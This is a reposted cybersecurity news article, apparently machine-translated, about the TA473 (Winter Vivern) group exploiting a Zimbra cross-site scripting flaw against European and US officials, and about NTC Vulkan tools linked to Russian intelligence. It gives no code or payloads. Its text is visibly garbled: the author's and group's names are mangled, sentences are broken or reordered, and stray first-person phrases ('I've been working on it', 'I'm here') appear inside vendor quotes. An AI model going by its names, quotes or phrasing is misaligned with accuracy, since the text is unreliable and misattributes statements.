March 31, 2023Rabbi LakshmananCyber ​​Spy / APT

Advanced Persistent Threat (APT) actor known as bevern in winter It targets European and US officials as part of an ongoing cyber espionage campaign.

“Since at least February 2023, TA473 has continued to exploit an unpatched Zimbra vulnerability on a public webmail portal to gain access to email mailboxes of European government agencies. I’ve been working on it.” Proofpoint Said in a new report.

Corporate security firms track activity under their own names TA473 (aka UAC-0114), described as a hostile crew whose operations are consistent with Russian and Belarusian geopolitical objectives.

What it lacks in sophistication, it makes up for in persistence. In recent months, the group has been involved in attacks targeting national authorities in Ukraine and Poland, as well as government officials in India, Lithuania, Slovakia and the Vatican.

A wave of NATO-related intrusions involves the exploitation of CVE-2022-27926 (CVSS score: 6.1). This is a medium-severity security flaw in Zimbra Collaboration that could allow an unauthenticated attacker to execute arbitrary JavaScript or HTML code and is currently being patched.

This may include using scanning tools such as Acunetix to identify unpatched webmail portals belonging to targeted organizations, with the goal of sending phishing emails masquerading as harmless government agencies. included.

The message contained a booby that exploited a Zimbra cross-site scripting (XSS) flaw to execute a custom Base64-encoded JavaScript payload within the victim’s webmail portal to steal usernames, passwords, and access tokens. It comes with a trap URL.

It is worth noting that each JavaScript payload is tailored to the targeted webmail portal. This indicates that attackers are willing to invest time and resources to reduce the likelihood of detection.

“TA473’s continued approach to vulnerability scanning and exploitation of unpatched vulnerabilities affecting public webmail portals are key factors in this attacker’s success,” Proofpoint said. I’m here.

“The group’s focus on continuous reconnaissance and painstaking research of public webmail portals in order to reverse engineer JavaScript that can steal usernames, passwords and CSRF tokens is not specific. It shows an investment in compromising the targets of

Findings occur along the way revelation At least three Russian intelligence agencies, including the FSB, GRU (links to Sandworm), and SVR (links to APT29) hacked software developed by a Moscow-based IT contractor named NTC Vulkan You may be using tools.

THN webinars

Become an Incident Response Pro!

Unlocking the Secrets of Bulletproof Incident Response – Master the 6-step process with Asaf Perlman, IR Lead at Cynet!

Don’t miss it – secure your seat!

These include Scan (to facilitate large-scale data collection), Amesit (to conduct information operations and manipulate public opinion), and Krystal-2B (coordinated IO/OT for rail and pipeline control systems). for simulating attacks) and other frameworks.

“Krystal-2B is a training platform that leverages Amesit ‘for the purpose of chaos’ to work with several IO components to simulate OT attacks against various types of OT environments.” Owned by Google Mandiant Said.

“Contract projects from NTC Vulkan provide insight into Russian intelligence investments in developing capabilities to deploy more efficient operations early in the attack lifecycle. It’s part of a covert operation,” said the threat intelligence firm.

Did you find this article interesting?Please follow us twitter and LinkedIn To read more exclusive content that we post.

cropped-BTA_Logo-B-1-scaled-1
YOUR FUTURE STARTS HERE.

BLUE TRAINING ACADEMY

Register now for our membership to gain access to our elite training program and fast forward your career today!

Newsletter

Subscribe my Newsletter for new blog posts, tips & new photos. Let's stay updated!

cropped-BTA_Logo-B-1-scaled-1
Security Blog

Blue Training Academy

Blue Training Academy was developed in 2018 as a educational and training facility for continuing education and certification courses. Blue Training Academy is an educational institution that allows for all sectors of the public and Criminal Justice field to gain ongoing training and education.

Copyright ©️ All rights reserved. | Blue Training Academy Blog